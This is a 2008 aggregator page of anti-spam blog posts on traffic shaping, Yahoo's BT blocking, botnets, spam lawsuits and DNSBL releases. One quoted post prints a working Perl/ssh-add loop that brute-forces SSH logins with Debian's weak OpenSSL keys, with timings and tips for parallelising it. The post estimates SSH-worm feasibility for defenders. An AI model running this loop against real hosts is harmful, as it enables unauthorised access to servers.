Planet Antispam

Real World Scenarios

Despite all the money invested into anti-spam solutions, spam volume continues to rise. Yes, spamming is an arms race. But the real race is one of sheer volume.

Spammers respond to difficulty by simply sending more spam. Better filtering? Send more to improve numbers getting through. Spamming not profitable enough? Send more spam. Users not interested? Send more variety. With botnets, spammers have a highly scalable delivery infrastructure and are not limited by resources. Unfortunately, it's the receiver of spam that bears the cost of that volume.

The problem is more than just the annoyance of spam. Spam is a big cost to organizations. High spam volumes lead to delays in email delivery and significant over-capacity to handle spikes in volume. Email providers know customers are very sensitive to any delays in the receipt of important email, and any service disruptions by a failure to handle loads can have immediate complaints and ongoing financial impacts.

Delays in email delivery caused by high spam traffic divert IT attention to chase spam.

Ongoing IT workload costs likely dwarf one-time capital expenditures for new systems.
Adding capacity in chunks with each budget period makes it difficult to know if it's too little or too much to scale capacity to meet volumes.

Traffic shaping reduce IT infrastructure and support costs because it removes more spam at the connection level than any other approach.

One of the Fortune 500 companies MailChannels works with has implemented traffic shaping solely to get their infrastructure costs under control. They were being flooded with spam and as a result legitimate email was being crowded out by the spam resulting in delivert delays of hours at a time. Their spam filters were getting rid of it so the end users didn’t see it but the servers were doing all they could to process backlogged traffic. The company couldn’t accept any more mail, they were are there limit in terms of concurrent SMTP connections and were at a loss to come up with a good strategy for dealing with all the spam.

They were using all the blacklists they could find, but even though the blacklists got rid of 50 to 70 percent of spam coming from known spam sources, the spam that got through was significant enough to be a very serious problem for end users and administrators trying to keep the email service flowing.

Implementing email traffic shaping in front of their servers dramatically dropped spam from 70 percent of all processed traffic down to 20 percent overnight as a result they turned off 4 of the 6 servers they were using to handle all inbound mail. More importantly, they no longer needed to waste time maintaining content filters, adding more servers or experiencing slow SMTP responses.

There are limitations with every anti-spam technology. While filtering is an effective at separating spam from email, it is only one layer in a multi-tiered anti-spam architecture designed to leverage various technologies suited to each task. Applying traffic shaping at the network edge ensures legitimate senders get excellent quality of service and their mail flows quickly, while spammers are given very poor quality of service and their mail is not allowed into your network.

Next post: Consequences of traffic shaping

May 16, 2008 05:44 PM

JD Falk of Box of Meat has a post that describes a problem Yahoo had with one of its new email security features. The article states that the problem arose when Yahoo decided to stop any emails going through the servers, which it runs for its partner BT (British Telecom), that did not have a matching BT/Yahoo address in the From: field. People who tried to send using their own domain names found the email did not get sent, and received a confusing message that they had "error 553" and offered a link where they could validate their domain.

The theory behind this is that Yahoo doesn't want spammers spoofing the From: field in messages using their service so they were going to cut everyone off who was doing that. The bad thing is that lots of people do it for legitimate reasons. Back in January of this year, I blogged about outbound spam filtering and listed a bunch of scenarios that we could implement in order to stop it.

One that we examined internally (but I never blogged about) was stopping people from sending mail from (From:) domains that they don't have listed in our admin center. We dropped that idea when we learned that we have piles and piles of clients that do this. One example is real estate agents that send outbound mail through us but have Reply-To's to a Yahoo.com email address, for example. You may be saying "Well, they shouldn't do that." Be that as it may, people do it and we need to work around it. Yahoo's case is a perfect example.

It appears that Yahoo opted for my option 3 that I did post about 4 months ago. Had Yahoo consulted my blog, they would have read that it was a complex option to implement and that it could annoy users to have to click a link to get their message through. I didn't write it at the time, but I should have added that it was far more likely to confuse users than annoy them.

Let this be a lesson for all of us: users are not easily fooled but they are easily confused.

May 16, 2008 04:45 PM

Mahalo Daily: I’m Gonna Git You Spamma!

most songs or videos about spam are insultingly bad, but this one actually has some smart dialogue

(via the email wars)

May 16, 2008 04:40 PM

Email Marketing Reports: The new email marketing: accepting accountability: in part 3 of an ongoing series, Mark Brownlow reminds us that “accountability communicates trust” — and explains some ways to be accountable when sending mail

May 16, 2008 04:26 PM

I don't need a calendar to tell me it's Friday. Phishers let me know by their increased volume on that day (for me anyway). The Friday ones link to hijacked web sites, usually European ones whose owners are just closing up shop for the weekend. It will be Monday before the owners even know they've been hosting criminal activity—by which time the damage will have been done.

May 16, 2008 04:11 PM

Here’s some pretty scary figures from Craig Hughes on the viability of an SSH worm:

when doing this, connecting to localhost:

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@localhost'"'"'); system("ssh-add -D"); $keys = ""; }'

4.63user 3.06system 0:19.54elapsed

ie about 50 per second

when connecting remotely over the internet (ping RTT is ~60ms):

find rsa -type f ! -name '*.pub' | head -1000 | time perl -e 'my $counter=0; my $keys=""; while(<>) { chomp; $keys = "$keys $_"; next unless (++$counter)%7 == 0; system("ssh-add$keys 2>/dev/null"); system ('"'"'ssh -q -n -T -C -x -a testuser@example.com'"'"'); system("ssh-add -D"); $keys = ""; }'

1.10user 0.60system 0:35.15elapsed

ie about 6 per second over the internet.

Logging of the failures on the server side looks like this:
May 15 10:53:31 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50445;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:32 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50446;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:33 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50447;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:34 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50448;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:35 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50451;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:36 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50452;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:37 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50453;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:39 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50455;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:40 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50456;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:41 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50457;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:42 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50458;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
May 15 10:53:43 [sshd] SSH: Server;Ltype: Version;Remote:
74.93.1.97-50459;Protocol: 2.0;Client: OpenSSH_4.7p1-hpn13v1
ie it shows the connection attempt, but NOT the failure. It shows one connection attempt per 7 keys attempted.

So given that:

RSA is the default if you don’t specify for ssh-keygen

99.99% of people use x86

PID is sequential, and there’s almost certainly an uneven distribution in PIDs used by the keys out there in the wild

then:

Probably there’s about 10k RSA keys which are in some very large fraction of the (debian-generated) authorized_keys files out there. These can be attempted in about 1/2 an hour, remotely over the internet. You can hit the full 32k range of RSA keys in an hour and a half. Note that the time(1) output shows how little load this puts on the client machine — you could easily run against lots of target hosts in parallel; most of the time is spent waiting for TCP roundtrip latencies. Actually, given that, you could probably accelerate the attack substantially by parallelizing the attempts to an individual host so you have lots of packets in flight at any given time. You could probably easily get up towards the 50/s local number doing this, which brings time down to about 3-4 minutes for 10k keys, or 11 minutes for the full 32k keys.

May 16, 2008 03:53 PM

xkcd: security holes

May 16, 2008 03:47 PM

Security Bytes: Google Docs used in latest spam run: Matt Sergeant describes Google Docs links appearing in spam, intended to fool users into clicking through — proving once again that no online service can assume it’ll stay free of abuse for long

May 16, 2008 02:47 PM

The Guardian: Yahoo downgrades antispam measure after causing BT email chaos:

This seems like something that should have been rolled out in a ‘log only’ mode for a day or two to see how much traffic it would affect.

The idea in general isn’t bad, but they probably should have counted how many different domains a given customer IP address sent as in a day and then only hit the ones that used an abnormally high number.

May 16, 2008 02:19 PM

If you’ve been following the Debian OpenSSL pRNG security debacle, you may have noticed that there’s a painful problem for people who’ve used a Debian or Ubuntu system in the process of buying a commercial SSL key — they are in a situation where those commercially-purchased keys need to be regenerated.

(When an SSL key is obtained from a commercial Certificate Authority, you first have to generate a Certificate Signing Request on your own machine, then send that to the CA, who extracts its contents and applies a signature to produce a valid CA-issued certificate.)

Things are looking up for these victims, though — some smart cookie at Debian came up with these instructions:

SSL Certificate Reissuance

If you paid good money to have a vulnerable key signed by a Certificate Authority (CA), chances are your CA can re-issue a certificate for free, provided all information in the CSR is identical to the original CSR. Create a new key with a non-vulnerable OpenSSL installation, re-create the CSR with the same information as your original (vulnerable) key’s CSR, and submit it to your CA according to their reissuance policy:

GeoTrust: Here (Available throughout the lifetime of the certificate. Tucows/OpenSRS in this case, but the instructions are generic to any GeoTrust client.)

Thawte: Here (Available throughout the lifetime of the certificate.)

VeriSign: Unknown

GoDaddy: Here (Only possible within 30 days of the initial order. GoDaddy calls the process “re-keying”, while they call the act of sending you the same signed certificate as your original order a “reissuance”.)

ipsCA: Generate a new CSR as if you are purchasing a new certificate, follow through the procedure up until you get to the point where you are required to pay with your credit card. At that point contact support via their email and let them know that you are requesting a revocation and re-issue and include the ticket number of your new CSR request.

CAcert: This is a cost free certification authority. Simply revoke your old certificates and add new ones. (The key has to be created on a fixed machine and ONLY the certification request has to be uploaded!) At the moment the certificate generation will take some time as it seems that many users are re issue there certificate.

Digicert: Login to Your account to re-issue (free).

This is slightly incorrect, however (unfortunately for me). While GeoTrust claim to offer free reissuance of all its SSL certificates, they don’t really. Their low-cost RapidSSL certs require that you buy ‘reissue insurance’ for $20 to avail of this, if you need to reissue more than 7 days after the initial purchase. :(

Wiki updated.

May 16, 2008 10:45 AM

Last September MySpace sued ur-spammers Sanford "Spamford" Wallace and Walt "Pickle Jar" Rines were for egregious violations of CAN SPAM. Neither responded, so as was widely reported, earlier this week the court granted a default judgement. Since they sent a lot of spam, the statutory damages came to an enormous $235 million. Even for Spamford, that's a lot of money.

May 16, 2008 06:11 AM

29805 patterns, 11859 right anchor strings, 99415 test IPs.

Contribs from yesterday, some QA, some catchup on old queue. Have been
trying to beef up the right anchor dynamics while pruning some prone to
FPs because they're static or mixed.

Was asked to start tracking couplets (pattern class and tech, taken
together as a sort of meta-identifier); there are three new couplets in
this release ('static/frame', for frame relay, 'static/broadband' for
broadband, and 'static/serial' for serial line).

Note that from 20080304 on, we will be including patterns for the
'outmx' tech type again, these should be understood as known legitimate
mail server naming conventions for their domain and you may wish to
exclude them from your use of the distro.

I've made sure to exclude outmx and webhost regexes from the exim and
postfix flat file distributions, so we should be safe there.

Those using the DNSBL interface will note that a return value of
127.0.2.11 now denotes an 'outmx'. This should not affect users of
the sendmail package, as I've not integrated support for scoring on
that basis into the package. Users of other DNSBL-aware tools should
modify their software, as we'll be adding a lot more of these in the
coming weeks.

Download them here:

sendmail:
http://enemieslist.com/downloads/sendmail_access_db
http://enemieslist.com/downloads/rightanchors

postfix:
http://enemieslist.com/downloads/postfix_regexp_table
http://enemieslist.com/downloads/postfix_regexp_table-20080515

exim:
http://enemieslist.com/downloads/exim_hosts
http://enemieslist.com/downloads/exim_hosts-20080515

May 15, 2008 11:11 PM

Terry Zink: Sample stats on botnets: interesting stats on botnet sizes & activities, as seen from Hotmail

May 15, 2008 07:45 PM

My piece at the "new" Industry Standard is finally up, with additional additions from Ian Lamont.

"These are the blogs you won't see on the Techmeme Leaderboard, Technorati's Top 100 blogs, or the CruchBase BloggerBoard ... at least not yet. They include VCs, entrepreneurs, coders, experts, and observers, and they bring a delicious mix of insight, experience, and passion to their blogs. While they may not have the right amount of link love, they need to be on your radar screens."

May 15, 2008 07:55 PM

A few months ago there was a research presentation presented on computer security. It touched upon botnets and the presenter gave some data. Below are some summary results based on a 9-day down-sampled spam trace from Hotmail.

There were 294 botnets detected, about 460,000 individual bots. This is about 1600 bots per botnet. That's smaller than I thought.
50% contained over 1000 machines.
80% use less than half of the bots in its network each time. This must be an attempt to reuse botnets so they limit the resources in order to keep them off of blocklists.
Large botnets send less numbers of spam messages per bot. This is intuitively obvious.
60% botnet-related spam are from long-lived botnets. Our own individual stats confirm this, we have a private blocklist where there is a core group of IPs that never go away.
50% contain machines from >30 countries. I have no information on what countries are the worst offenders.

One day we plan to start combing through our own data to see if we can find even more granular detail on spammers and their botnets.

May 15, 2008 06:08 PM

Joho the Blog: Jonathan Zittrain: David Weinberger’s live recap of a talk in which Jonathan Zittrain discusses the balance between the openness which let the early internet grow and experiment and thrive, and the need for security on the modern result

May 15, 2008 04:23 PM

Slate: eBay v. Craigslist.: a good round-up of links & info, to augment the opinion posted earlier

May 15, 2008 03:04 PM

So, I happened upon the Wikipedia page about the Miss World pageant and noticed that it had a list of winners by country. For example, India has won Miss World 5 times. But, of course, India has a very large population so you'd expect it to be able to churn out a few beauties. So, to get a better idea here is a population adjusted list of countries that have won Miss World:

Country	Wins	Pop.	Wins/Pop.	Normalized
Bermuda	1	66163	0.0000151141876879827	100.00%
Iceland	3	316252	0.00000948610601672084	62.76%
Grenada	1	110000	0.00000909090909090909	60.15%
Guam	1	173456	0.00000576515081634536	38.14%
Jamaica	3	2651000	0.000001131648434553	7.49%
Trinidad and Tobago	1	1305000	0.000000766283524904215	5.07%
Sweden	3	9182927	0.000000326693221017656	2.16%
Puerto Rico	1	3994259	0.000000250359328225836	1.66%
Austria	2	8316487	0.000000240486157195941	1.59%
Ireland	1	4339000	0.000000230467849734962	1.52%
Finland	1	5308208	0.000000188387493481793	1.25%
Venezuela	5	28199822	0.000000177306083705067	1.17%
Israel	1	7282000	0.000000137324910738808	0.91%
Netherlands	2	16408557	0.000000121887622415548	0.81%
Dominican Republic	1	9760000	0.000000102459016393443	0.68%
Czech Republic	1	10381130	0.0000000963286270377117	0.64%
Australia	2	21290000	0.0000000939408172851104	0.62%
Greece	1	11216708	0.0000000891527175353054	0.59%
Peru	2	28674757	0.0000000697477575834383	0.46%
UK	4	60487300	0.0000000661295842267716	0.44%
Argentina	2	40301927	0.0000000496254186555397	0.33%
South Africa	2	43700000	0.000000045766590389016	0.30%
Poland	1	38518241	0.0000000259617255107781	0.17%
France	1	64473140	0.0000000155103350015216	0.10%
Turkey	1	70586256	0.0000000141670639111387	0.09%
Egypt	1	80335036	0.0000000124478689472424	0.08%
Germany	1	82210000	0.0000000121639703199124	0.08%
Russia	1	142008838	0.00000000704181524251329	0.05%
Nigeria	1	148000000	0.00000000675675675675676	0.04%
US	2	304072000	0.00000000657738956562919	0.04%
Brazil	1	186757608	0.00000000535453420457174	0.04%
India	5	1132446000	0.00000000441522156464856	0.03%
China	1	1321851888	0.000000000756514409124179	0.01%

So, far and away, the top three are Bermuda, Iceland and Grenada. Given that Bermuda is the winner, and a tax-haven, and has a sub-tropical climate... Hamilton here I come!

May 15, 2008 08:35 AM

29671 patterns, 11864 right anchor strings, 99326 test IPs.

Contribs from the past couple days, some QA, some catchup on old queue.
Have been trying to beef up the right anchor dynamics while pruning some
prone to FPs because they're static or mixed.

Was asked to start tracking couplets (pattern class and tech, taken
together as a sort of meta-identifier); there is one new couplet in
this release ('webhost/exim').

Note that from 20080304 on, we will be including patterns for the
'outmx' tech type again, these should be understood as known legitimate
mail server naming conventions for their domain and you may wish to
exclude them from your use of the distro.

I've made sure to exclude outmx and webhost regexes from the exim and
postfix flat file distributions, so we should be safe there.

Those using the DNSBL interface will note that a return value of
127.0.2.11 now denotes an 'outmx'. This should not affect users of
the sendmail package, as I've not integrated support for scoring on
that basis into the package. Users of other DNSBL-aware tools should
modify their software, as we'll be adding a lot more of these in the
coming weeks.

Download them here:

sendmail:
http://enemieslist.com/downloads/sendmail_access_db
http://enemieslist.com/downloads/rightanchors

postfix:
http://enemieslist.com/downloads/postfix_regexp_table
http://enemieslist.com/downloads/postfix_regexp_table-20080514

exim:
http://enemieslist.com/downloads/exim_hosts
http://enemieslist.com/downloads/exim_hosts-20080514

May 15, 2008 01:30 AM

Daytona Beach News-Journal: Locals accused in $77 million Internet drug scheme:

the article doesn’t mention spam, but it seems likely

(via fergdawg)

May 14, 2008 09:52 PM

Accused spammer Sanford Wallace has been sued... again. And he has had a major judgment made against him... again. This time, it's to the tune of $230 million.

From the Associated Press:

NEW YORK (AP) - A notorious "Spam King" and his partner now owe MySpace about $230 million in damages after a federal judge awarded the popular online hangout what is believed to be the largest anti-spam judgment ever.

The judgment is a big victory for MySpace, although service providers often have a tough time collecting such awards. But even if the News Corp owned site never collects, it hopes the judgment deters other spammers.

"Anybody who's been thinking about engaging in spam are going to say, 'Wow, I better not go there,'" MySpace's chief security officer, Hemanshu Nigam, told The Associated Press on Tuesday. "Spammers don't want to be prosecuted. They are there to make money. It's our job to send a message to stop them."

Nigam told the AP that Wallace and Rines created their own MySpace accounts or took over existing ones by stealing passwords through "phishing" scams.

They then e-mailed other MySpace members, he said, "asking them to check out a cool video or another cool site. When you (got) there, they were making money trying to sell you something or making money based on hits or trying to sell ring tones."

MySpace said the pair sent more than 730,000 messages to MySpace members, many made to look like they were coming from trusted friends, giving them an air of legitimacy. Under the 2003 federal anti-spam law known as CAN-SPAM, each violation entitles MySpace to $100 in damages, tripled when conducted "willfully and knowingly."

Another spammer gets sued, but it's questionable whether or not this will have any sort of deterrent in the spam community. MySpace will have to attempt to collect payment on this guy to actually shut him down. In addition, while breaking into MySpace and stealing passwords is illegal, many other spammers simply use botnets to deliver their payload of spam. In other words, they spam the internet by using means that are much more difficult to track down.

Still, if you are a spammer and start to get a reputation as being a big-time spammer, you are painting a target on your back. Eventually, a bigger fish (like Microsoft or News Corp) will come and eat you. Then the rest of us who fight spam will get to enjoy a little schaudenfreude.

May 14, 2008 07:54 PM

Not specifically email related but close enough.

ZDnet has a blog entry talking about Craigslist’s claim of phishing by eBay against them.

As a part of the ongoing legal drama between eBay and Craigslist, Craigslist has now sued eBay. Among their claims is something they are calling phishing attacks. In reality it looks like what they are talking about is a very misleading Google ad.

While I certainly think there’s something unappetizing about these advertising practices I am not sure it qualifies as phishing. I guess this would come down to whether they intended to deceive user’s who thought they were going to Craigslist.

Did eBay cross a legal line here? Is this just slimy behavior, or is it legitimate search advertising? I’m leaning towards slimy. What about you?

May 14, 2008 06:48 PM

Terry Zink: Hard to see, the future is: a fine summary of the difficulties of measuring anti-spam effectiveness

May 14, 2008 03:53 PM

About 15 months ago I started work on a project that measures our spam effectiveness. Just last week the first part of it finally went live, end-to-end. It was a long time coming but we finally got it done. If you're wondering what took so long, let me tell you:

We need a source of spam.
We need to capture it.
We have to avoid interfering with legitimate mail delivery.
We need to log the data.
We need to adhere to privacy requirements.
We need to create an isolated network within our network to actually do the filtering.
We need to display the data afterwards.

None of those things is trivial because while the network is designed to mimic our existing filtering infrastructure, there are lots and lots of small differences. A pile of small differences adds up to a major engineering challenge.

Anyhow, the project originally started off as how to gauge our spam catch rate and false positive rate. As we started going along, it became clear to me that I had to scale back my expectations and I started concentrating and how to measure spam. Fancy charts, training the filter on false negatives, measuring false positives, post-examination, correlation between filters on missed messages... all of this stuff is cool but I had to first get up first rung on the ladder.

Now that we're looking at part 2, measuring our false positive rate, lots and lots of questions are popping up. How do we measure ourselves against our competition? How do we improve our effectiveness? How do we leverage this network? How do we correlate different false positives and false negatives across different filters? In other words, we now have some visibility and questions are arising about what this thing will look like at the end.

The truth is that I haven't completely thought everything through, I only have a rough outline. George Lucas has stated, of the Star Wars prequels, that when he wrote the stories back in 1975, he had a pretty good idea of what they would all look like. While he didn't have all the details ironed out the three new movies pretty much adhered to his basic storyline.

Well, similarly, while I haven't completely thought through all of the details and plot points, I have a pretty good idea of what this network will do when all is said and done. The end game is to create a network that measures how well we are doing on spam and non-spam, does training on false negatives/positives, determines our response time, compares ourselves to competitors and includes piles of statistics (because I like charts).

Now I need to hire a writer to get the dialogue to not be so cheesy.

May 14, 2008 06:14 AM

Chicago Tribune: MySpace tells AP it has won $234M spam judgment:

MySpace won (not surprisingly) against Sanford Wallace and Walt Rines, both of whom have lost case after case after case but still haven’t learned anything

(via fergdawg)

May 14, 2008 12:28 AM

GCN: Whittling spam down to a manageable level: “According to a study…by KnujOn…90 percent of the illicit Web sites using spam to generate traffic are clustered on just 20 registrars…”

May 13, 2008 11:47 PM

Insight on the topic (and thoughts on industry leadership issues) from Ken Magill and Laura Atkins.

May 13, 2008 10:10 PM

I'm sure that big-time spammers ("mainsleaze" in the anti-spam trade) believe they are outstanding marketers. That's hard to reconcile with a piece of spam I saw this morning.

It claimed to come from Dilun. At first I thought it was a poor attempt to replicate the name Dillon, but upon further investigation, it is apparently a name found in Asian countries.

Using the Subject: line as a grabber, this spammer went for the jugular:

Subject: You have been caught spamming

This is one of those "impending doom" openers that is intended to get the recipient to open the message immediately—to really put him or her on the defensive.

The message body, however, is pure spam material:

Jessica Alba caught in embarassing situations on camera http://www.[Removed].com/

It's unclear to me how the spammer expects the recipient to react to the mind bend that occurs between seeing the Subject: line in the inbox and what appears to be a porn type of solicitation. Is the recipient supposed to be assuaged by the discovery that the spamming accusation was false? It's a real head-scratcher to me.

Okay, so let's say the recipient wasn't put off by the overt lie that tricked him into opening the message, but he's interested in seeing the purported "embarassing [sic] situations."

Whenever I see links to porn or pop culture photos, I usually suspect a malware installer at the destination. The spamvertised domain is so fresh that it doesn't even show up in whois yet, generally indicating that it's just temporarily parked, and will go away in a few days when the registrar discovers that it hasn't really been paid for.

I used one of my software tools to visit the site without a browser to see if the page's source code revealed any malware downloading going on. I'm able to make the server believe I'm doing this with Internet Explorer 6 for Windows to make sure I get the royal (as in "royally hosed") malware treatment.

It turns out that the spamvertised web site is only for an herbal penis enhancement med. That's the third time this spammer has screwed with the target's head. How receptive will someone be by the time he reaches this site?

BTW, I'm really glad I saw the page only in HTML source code form. There are apparently some testimonials on the page with Before and After photos. Excuse my clinical response: ew, Ew, EW!

May 13, 2008 05:04 PM

Wow… you know gas is expensive when the spammers start hawking gas cards.

Our support contact address received a message touting “Finest List of Nurses Including Email Addresses - Free $50 Gas Card” I had to wonder what the heck it was, so I took a look at the message. They were trying to sell “sales leads” — i.e. names and contact information — of nurses, and were offering to throw in the gas card if you spent enough on “leads” to do your own spamming.

May 13, 2008 05:03 PM

Planet Antispam

May 16, 2008

May 15, 2008

May 14, 2008

May 13, 2008

Subscriptions

Planetarium: